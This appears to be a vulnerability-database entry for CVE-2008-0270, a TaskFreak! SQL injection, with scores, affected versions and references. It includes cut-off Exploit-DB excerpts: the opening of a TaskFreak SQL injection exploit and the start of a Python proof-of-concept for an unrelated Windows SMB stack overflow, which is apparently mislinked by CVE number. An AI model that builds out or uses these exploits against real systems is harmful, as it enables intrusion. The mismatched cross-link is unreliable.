CVE-2008-0270
published 2008-01-15CVE-2008-0270: SQL injection vulnerability in index.php in TaskFreak! 0.6.1 and earlier allows remote authenticated users to execute arbitrary SQL commands via the sContext…
PriorityP432medium6CVSS 2.0
AVNACMAuSCPIPAP
EXPLOIT
EPSS
0.84%
53.3th percentile
SQL injection vulnerability in index.php in TaskFreak! 0.6.1 and earlier allows remote authenticated users to execute arbitrary SQL commands via the sContext parameter.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| taskfreak | taskfreak | <= 0.6.1 | — |
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
exploitdb·2010-04-17·CVSS 9.0
CVE-2010-0477 [CRITICAL] Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
Microsoft Windows 7/2008 R2 - SMB Client Trans2 Stack Overflow (MS10-020) (PoC)
---
import sys,SocketServer
# Windows 7/2008R2 SMB Client Trans2 stack overflow (MS10-020)
# Date: 17/04/10
# Author: Laurent Gaffié
# Tested on: Windows 7/2008R2
# CVE: CVE-2010-0270
# Full advisory: http://seclists.org/fulldisclosure/2010/Apr/201
# More information: http://g-laurent.blogspot.com/2010/04/ms10-020.html
#
# Note from Exploit-DB: It has been reported to us that CVE-2010-0020 also applies
#
EBP = "\x42\x42\x42\x42"
EIP = "\x41\x41\x41\x41"
packetnego = (
"\x00\x00\x00\x55"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x98\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x11\x05\x00\x03\x0a\x00\x01\x00\x04\x11\x00\x00\x00\x00\x01\x00"
"\x00\x00\x00\x00\xf
Exploit-DB
TaskFreak! 0.6.1 - SQL Injection
exploitdb·2008-01-12
CVE-2008-0270 TaskFreak! 0.6.1 - SQL Injection
TaskFreak! 0.6.1 - SQL Injection
---
########################################################################################
########### _______ __ _____ ___ __ ###########
########### |_ _| |--.-----.| \.-----.' _|.---.-.----.-----.--| | ###########
########### | | | | -__|| -- | -__| _|| _ | __| -__| _ | ###########
########### |___| |__|__|_____||_____/|_____|__| |___._|____|_____|_____| ###########
########### ###########
########### TheDefaced.org ###########
########### TheDefaced Security Team Presents An 0-day. ###########
########### TaskFreak! SQL Injection ###########
########################################################################################
# Product: #
# TaskFreak!/Discovered in addWhere('context = \''.$pContext.'\''); #
# $pLink=Tzn::concatUrl($pLink,'sContex
No writeups or analysis indexed.
http://secunia.com/advisories/28448http://www.securityfocus.com/bid/27257https://exchange.xforce.ibmcloud.com/vulnerabilities/39645https://www.exploit-db.com/exploits/4899http://secunia.com/advisories/28448http://www.securityfocus.com/bid/27257https://exchange.xforce.ibmcloud.com/vulnerabilities/39645https://www.exploit-db.com/exploits/4899
2008-01-15
Published